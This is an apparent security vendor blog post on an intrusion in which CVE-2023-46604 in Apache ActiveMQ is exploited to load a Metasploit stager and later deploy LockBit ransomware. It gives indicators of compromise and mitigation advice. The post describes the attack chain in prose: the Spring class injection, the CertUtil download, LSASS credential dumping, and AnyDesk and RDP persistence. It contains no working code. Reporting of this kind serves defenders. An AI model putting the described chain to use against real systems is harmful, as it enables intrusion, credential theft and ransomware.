Let's Talk
Let's Talk

Loading...

Blog Details

  • Home
  • /
  • ActiveMQ Vulnerability Triggers LockBit Ransomware Attack

ActiveMQ Vulnerability Triggers LockBit Ransomware Attack

Tudorel Iancu

Threat Overview

On 2026-02-23 the DFIR Report identified a multi‑stage intrusion that began with exploitation of the CVE‑2023‑46604 vulnerability in an internet‑facing Apache ActiveMQ instance. The threat actor achieved remote code execution via a malicious Spring bean configuration XML, downloading a Metasploit stager, and progressing to a full‑blown LockBit ransomware campaign. The attack demonstrates how a single unpatched service can become a launchpad for enterprise‑wide compromise.

Attack Vector

The initial compromise leveraged an RCE in Apache ActiveMQ that allowed the attacker to inject a Java Spring class reference (org.springframework.context.support.ClassPathXmlApplicationContext) and a URL pointing to a crafted XML file. The XML contained a command that used the Windows CertUtil utility to download a Metasploit stager. Once executed, the stager provided the attacker with a foothold on the beachhead host.

Post‑Exploitation Activities

After the Metasploit stager was installed, the actor executed a series of post‑exploitation actions:

  • Elevated privileges via the Metasploit “GetSystem” command, creating a new service (kesknq) that exploited a privileged service account.
  • Dumped LSASS memory on multiple hosts to harvest domain administrator credentials.
  • Performed network scanning using SMB traffic, identifying potential lateral movement targets.
  • Installed AnyDesk on the beachhead host, enabling remote control and persistence through an automatically starting service.
  • Executed a custom batch file (rdp.bat) to enable RDP on the network, opening firewall rules and configuring the RDP port to 3389.

Ransomware Deployment

Seventeen days after the initial intrusion, the actor returned to the same unpatched ActiveMQ server, re‑established a foothold, and repeated the privilege escalation and credential harvesting steps. Using the compromised credentials, the attacker logged into backup and file servers via RDP, dropped two LockBit ransomware binaries (LB3_pass.exe and LB3.exe), and executed them with specific path and password flags. The binaries were launched interactively through RDP sessions, and the attack persisted for approximately four hours before the actor ceased activity. The Time to Ransomware (TTR) from first access to ransomware deployment was 419 hours (~19 calendar days). Had an organization only detected the second intrusion, the window for mitigation would have been less than 90 minutes.

Indicators of Compromise

Key indicators include:

  • ActiveMQ RCE alerts: ET INFO Apache ActiveMQ Instance – Vulnerable to CVE‑2023‑46604, ET EXPLOIT Successful Apache ActiveMQ Remote Code Execution (CVE‑2023‑46604).
  • Metasploit stager downloads via CertUtil: IP 166.62.100.52, event ID 11 indicating certutil file creation.
  • Service creation and persistence: kesknq service, AnyDesk service (auto‑start).
  • Credential dumping: LSASS memory access on multiple hosts.
  • RDP configuration changes: batch file rdp.bat, firewall rule additions, registry modifications for RDP.
  • LockBit binaries: SHA256 hashes C8646CFB574FF2C6F183C3C3951BF6B2C6CF16FF8A5E949A118BE27F15962FAE and 8CEEE89550C521BA43F59D24BA53A22A3B69EAD0FCE118508D0A87A383D6A7B6.

Recommendations

To mitigate similar attacks, security teams should:

  • Patch promptly: Ensure Apache ActiveMQ and all related components are updated to the latest version to close CVE‑2023‑46604.
  • Implement network segmentation: Restrict external access to critical services and isolate ActiveMQ behind a firewall with strict inbound rules.
  • Deploy Web Application Firewall (WAF) rules: Block malicious OpenWire traffic patterns that match known exploitation signatures.
  • Enforce least privilege: Harden service accounts, disable unused administrative accounts, and enforce MFA for domain administrators.
  • Monitor for certificate tool misuse: Alert on CertUtil downloads from external IPs, especially when paired with new executable creation.
  • Enable endpoint detection and response (EDR): Detect and block suspicious service creation, DLL injection, and RDP configuration changes.
  • Implement proper backup hygiene: Keep offline, immutable backups and test restoration procedures to reduce ransomware impact.
  • Conduct threat hunting: Search logs for failed and successful RCE attempts, LSASS memory reads, and remote service execution patterns.

Conclusion

This incident underscores the importance of timely patch management, vigilant monitoring, and a layered security approach. By addressing the root vulnerabilities and strengthening detection capabilities, organizations can prevent initial compromise and limit the reach of subsequent ransomware deployments.

Leave a Reply

Looking for the Best Cyber Security?

Get A Quote
Get A Quote

Seamlessly integrate local and cloud resources with our comprehensive cybersecurity services. Protect user traffic at endpoints using advanced security solutions like threat hunting and endpoint protection. Build a scalable network infrastructure with continuous monitoring, incident response, and compliance assessments.

Linkedin Telegram X-twitter WordPress

Company

Quick Link

Contact Us

  • Address: Reithalleweg 3 Wohlen CH
  • Email: support@essgroup.tech
  • Phone:

Copyright © 2025 ESSGroup

Discover more from ESSGroup

Subscribe now to keep reading and get access to the full archive.

Continue reading